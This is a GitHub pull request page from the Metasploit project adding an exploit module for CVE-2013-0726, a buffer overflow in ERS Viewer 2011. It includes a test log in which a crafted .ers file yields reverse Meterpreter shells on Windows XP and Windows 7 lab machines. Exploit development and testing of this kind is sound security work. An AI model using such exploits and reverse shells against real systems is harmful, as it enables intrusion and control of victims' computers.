Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add module for CVE-2013-0726 #1808

Merged
merged 1 commit into from May 8, 2013
Merged

Add module for CVE-2013-0726 #1808

merged 1 commit into from May 8, 2013

Conversation

jvazquez-r7
Copy link
Contributor

Vulnerable software: ERS Viewer 2011, version 11.04, can be found here:

http://geospatial.intergraph.com/resources/downloads/download/ERDAS_ER_Viewer_2011_Version_11_0_4.aspx?Downloads=ProductDownloadItem

Test on Windows XP SP3 and W7 SP1:

msf exploit(erdas_er_viewer_bof) > rexploit
[*] Reloading module...

[+] msf.ers stored at /Users/juan/.msf4/local/msf.ers
msf exploit(erdas_er_viewer_bof) > use exploit/multi/handler 
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 10.6.0.165:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:51547) at 2013-05-08 13:21:45 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 10.6.0.165:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 3 opened (10.6.0.165:4444 -> 10.6.0.165:51690) at 2013-05-08 13:36:22 -0500

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
emeterpreter > exit -y
[*] Shutting down Meterpreter...

wchen-r7 added a commit that referenced this pull request May 8, 2013
@wchen-r7
Landing #1808 - ERS Viewer 2011 bof (CVE-2013-0726)
0e51042
@wchen-r7 wchen-r7 merged commit 1aa80cd into rapid7:master May 8, 2013
@jvazquez-r7 jvazquez-r7 deleted the erdas_er_viewer_bof branch November 18, 2014 15:46
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@jvazquez-r7 @wchen-r7